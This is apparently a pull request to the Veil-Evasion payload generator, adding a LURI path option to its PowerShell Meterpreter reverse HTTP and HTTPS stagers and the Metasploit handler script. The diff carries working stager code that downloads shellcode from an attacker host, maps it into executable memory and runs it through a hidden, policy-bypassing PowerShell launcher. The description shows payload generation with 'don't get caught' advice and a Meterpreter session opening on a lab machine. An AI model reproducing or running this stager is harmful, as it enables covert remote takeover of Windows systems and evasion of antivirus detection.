### PR TITLE
Modifying to allow for LURI parameter

### DIFF
--- a/modules/common/controller.py
+++ b/modules/common/controller.py
@@ -568,6 +568,10 @@ class Controller:
                 if "LPORT" in keys:
                     handler += "set LPORT " + payload.required_options["LPORT"][0] + "\n"
 
+                # grab the LURI value if it was set. ignore the / as that is the default
+                if "LURI" in keys and payload.required_options["LURI"][0] != "/":
+                    handler += "set LURI " + payload.required_options["LURI"][0] + "\n"
+
                 handler += "set ExitOnSession false\n"
                 handler += "exploit -j\n"
 

--- a/modules/payloads/powershell/meterpreter/rev_http.py
+++ b/modules/payloads/powershell/meterpreter/rev_http.py
@@ -49,7 +49,7 @@ $o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" 
                                                                               self.required_options["USER_AGENT"][0],
                                                                               self.required_options["LHOST"][0], 
                                                                               self.required_options["LPORT"][0],
-                                                                              "/" if self.required_options["LURI"][0] == "/" else "%s/" % self.required_options["LURI"][0])                                                                             
+                                                                              "" if self.required_options["LURI"][0] == "/" else "%s/" % self.required_options["LURI"][0])                                                                             
         encoded = helpers.deflate(baseString)
         payloadCode = "@echo off\n"
         payloadCode += "if %PROCESSOR_ARCHITECTURE%==x86 ("

--- a/modules/payloads/powershell/meterpreter/rev_http.py
+++ b/modules/payloads/powershell/meterpreter/rev_http.py
@@ -24,12 +24,12 @@ class Payload:
                                     "LPORT" : ["8080", "Port of the Metasploit handler"],
                                     "PROXY" : ["N", "Use system proxy settings"],
                                     "STAGERURILENGTH" : ["4", "The URI length for the stager (at least 4 chars)."],
+                                    "LURI" : ["/","The HTTP path to prepend to the listener. Ex: http://attacker:port/[LURI]"],
                                     "USER_AGENT" : ["Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)", "The User-Agent header to send with the initial stager request"]
                                 }
 
 
     def generate(self):
-
         proxyString = "$pr = [System.Net.WebRequest]::GetSystemWebProxy();$pr.Credentials=[System.Net.CredentialCache]::DefaultCredentials;$m.proxy=$pr;$m.UseDefaultCredentials=$true;"
         baseString = """$q = @"
 [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
@@ -41,13 +41,15 @@ function t {$f = "";1..%i|foreach-object{$f+= $d[(get-random -maximum $d.Length)
 function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
 function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}
 $m = New-Object System.Net.WebClient;%s$m.Headers.Add("user-agent", "%s")
-$n = g; [Byte[]] $p = $m.DownloadData("http://%s:%s/$n" )
+$n = g; [Byte[]] $p = $m.DownloadData("http://%s:%s/%s$n" )
 $o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru
 $x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)
 $o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %((int(self.required_options["STAGERURILENGTH"][0])-1),
                                                                               "" if self.required_options["PROXY"][0] == "N" else proxyString,
                                                                               self.required_options["USER_AGENT"][0],
-                                                                              self.required_options["LHOST"][0], self.required_options["LPORT"][0])
+                                                                              self.required_options["LHOST"][0], 
+                                                                              self.required_options["LPORT"][0],
+                                                                              "/" if self.required_options["LURI"][0] == "/" else "%s/" % self.required_options["LURI"][0])                                                                             
         encoded = helpers.deflate(baseString)
         payloadCode = "@echo off\n"
         payloadCode += "if %PROCESSOR_ARCHITECTURE%==x86 ("

--- a/modules/payloads/powershell/meterpreter/rev_https.py
+++ b/modules/payloads/powershell/meterpreter/rev_https.py
@@ -24,6 +24,7 @@ class Payload:
                                     "LPORT" : ["8443", "Port of the Metasploit handler"],
                                     "PROXY" : ["N", "Use system proxy settings"],
                                     "STAGERURILENGTH" : ["4", "The URI length for the stager (at least 4 chars)."],
+                                    "LURI" : ["/","The HTTP path to prepend to the listener. Ex: http://attacker:port/[LURI]"],
                                     "USER_AGENT" : ["Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)", "The User-Agent header to send with the initial stager request"]
                                 }
 
@@ -40,15 +41,16 @@ function t {$f = "";1..%i|foreach-object{$f+= $d[(get-random -maximum $d.Length)
 function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
 function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}
 [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$m = New-Object System.Net.WebClient;%s
-$m.Headers.Add("user-agent", "%s");$n = g; [Byte[]] $p = $m.DownloadData("https://%s:%s/$n" )
+$m.Headers.Add("user-agent", "%s");$n = g; [Byte[]] $p = $m.DownloadData("https://%s:%s/%s$n" )
 $o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru
 $x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)
 $o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %((int(self.required_options["STAGERURILENGTH"][0])-1), 
                                                                               "" if self.required_options["PROXY"][0] == "N" else proxyString,
                                                                               self.required_options["USER_AGENT"][0],
-                                                                              self.required_options["LHOST"][0], self.required_options["LPORT"][0])
+                                                                              self.required_options["LHOST"][0], 
+                                                                              self.required_options["LPORT"][0],
+                                                                              "/" if self.required_options["LURI"][0] == "/" else "%s/" % self.required_options["LURI"][0])
         encoded = helpers.deflate(baseString)
-
         payloadCode = "@echo off\n"
         payloadCode += "if %PROCESSOR_ARCHITECTURE%==x86 ("
         payloadCode += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"" % (encoded)

--- a/modules/payloads/powershell/meterpreter/rev_https.py
+++ b/modules/payloads/powershell/meterpreter/rev_https.py
@@ -49,7 +49,7 @@ $o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" 
                                                                               self.required_options["USER_AGENT"][0],
                                                                               self.required_options["LHOST"][0], 
                                                                               self.required_options["LPORT"][0],
-                                                                              "/" if self.required_options["LURI"][0] == "/" else "%s/" % self.required_options["LURI"][0])
+                                                                              "" if self.required_options["LURI"][0] == "/" else "%s/" % self.required_options["LURI"][0])
         encoded = helpers.deflate(baseString)
         payloadCode = "@echo off\n"
         payloadCode += "if %PROCESSOR_ARCHITECTURE%==x86 ("


### PR DESCRIPTION
Modifications to allow for the new LURI parameter within the reverse HTTP/S payloads ([See MSF](https://github.com/rapid7/metasploit-framework/pull/6342). Tested against PowerShell reverse_http/reverse_https.

### Veil
```
# ./Veil-Evasion.py -p powershell/meterpreter/rev_http -c LHOST=192.168.56.104  LPORT=80 LURI=foo --overwrite -o veil_reverse_http 
[...]
=========================================================================
 Veil-Evasion | [Version]: 2.26.1
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 Payload: powershell/meterpreter/rev_http


 Language:		powershell
 Payload:		powershell/meterpreter/rev_http
 Required Options:      LHOST=192.168.56.104  LPORT=80  LURI=foo  PROXY=N
                        STAGERURILENGTH=4  USER_AGENT=Mozilla/4.0
                        (compatible; MSIE 6.1; Windows NT)
 Payload File:		/usr/share/veil-output/source/veil_reverse_http.bat
 Handler File:		/usr/share/veil-output/handlers/veil_reverse_http_handler.rc

 [*] Your payload files have been generated, don't get caught!
 [!] And don't submit samples to any online scanner! ;)
```
### MSF
```
msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.56.104   yes       The local listener hostname
   LPORT     80               yes       The local listener port
   LURI      foo              no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run 

[*] Started HTTP reverse handler on http://192.168.56.104:80/foo/
[*] Starting the payload handler...
[...]
[*] http://192.168.56.104:80/foo/ handling request from 192.168.56.102-> (foo) ; (UUID: 0pb1vr39) Staging Native payload...
[*] Meterpreter session 2 opened (192.168.56.104:80 -> 192.168.56.102:50003) at 2016-04-21 15:43:23 +0100

meterpreter > 
```